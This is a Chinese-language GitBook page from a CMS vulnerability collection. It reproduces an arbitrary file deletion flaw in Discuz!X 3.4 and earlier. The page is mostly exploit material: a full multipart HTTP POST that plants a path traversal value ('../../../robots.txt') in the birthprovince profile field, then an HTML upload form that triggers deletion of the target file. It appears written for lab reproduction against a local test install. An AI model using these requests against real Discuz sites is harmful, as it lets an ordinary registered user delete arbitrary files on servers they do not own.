secskill
secskill
Introduction
1.web应用漏洞
2.中间件漏洞
3.系统漏洞
4.网络漏洞
5.cms漏洞
5.1 08cms
5.2 74cms
5.3 Appcms
5.4 Aspcms
5.5 Bluecms
5.6 Cscms
5.7 Dedecms
5.8 Discuz
5.8.1 Discuz任意文件删除
5.9 Dkcms
5.10 Ecshop
5.11 Finecms
5.12 Fscms
5.13 Jeecms
5.14 Ibcms
5.15 Maccms
5.16 Php168
5.17 Phpcms
5.18 Phpmywind
5.19 Phpwind
5.20 Phpweb
5.21 Qibocms
5.22 Seacms
5.23 Shopex
5.24 Thinkphp
5.25 Typecho
5.26 Wordpress
5.27 Xycms
5.28 Zabbix
5.29 Zblog
5.30 Zzcms
Powered by GitBook

5.8.1 Discuz任意文件删除

影响版本:Discuz!X ≤3.4

漏洞详情:https://lorexxar.cn/2017/09/30/dz-delete/

漏洞复现

安装Discuz X3.4

安装完成之后,先访问一下robot.txt,确定其文件存在(我的已经被删了,借网上的图)

img

然后注册个普通用户账户,在个人资料处找到找到自己的formhash:

带上自己的Cookie、formhash发送如下数据包:

POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: 192.168.174.128
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:JSESSIONID=FV4fcRqDD8dnQ6QV2fW2QF7sLWGQR54w9NHs1ND3nvpX42M3dFKy!1896303974; Gyeu_2132_saltkey=KE98Psrp; Gyeu_2132_lastvisit=1557226499; Gyeu_2132_sid=BD3lOL; Gyeu_2132_lastact=1557230363%09home.php%09spacecp; Gyeu_2132_onlineusernum=1; Gyeu_2132_seccode=1.ed6d0543029810d816; Gyeu_2132_ulastactivity=9feaQBwFs5A3KtNxNbXCfi5U8MG5lhcZFxonFJWtIN0wKGLcpFE6; Gyeu_2132_auth=35fdP7M1CDLaPPh3CcHBuLE%2FS5%2Byho%2FBy8kE%2FF3llJTtEYgnGajkeuR3mkozjRnUlaFIHVDva6IRFNRBxDf%2F; Gyeu_2132_home_readfeed=1557230307; Gyeu_2132_noticeTitle=1
Connection: close
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"
3d86b691                   //此处为个人的formhash
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"
../../../robots.txt                //指定目录为robots.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"
1
------WebKitFormBoundaryPFvXyxL45f34L12s--

提交成功之后,用户资料修改页面上的出生地就会显示成下图所示的状态:

然后本地在构造一个上传的HTML文件,用浏览器打开

代码如下,将其中的[your-ip]改成discuz的域名,[form-hash]改成你的formhash:

<body>
    <form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">
        <input type="file" name="birthprovince" />
        <input type="submit" value="upload" />
    </form>
</body>

任意上传一个图片,

然后上传成功之后再去访问robot.txt,发现其文件已被删除

Previous
5.8 Discuz
Next
5.9 Dkcms
Last updated 8 months ago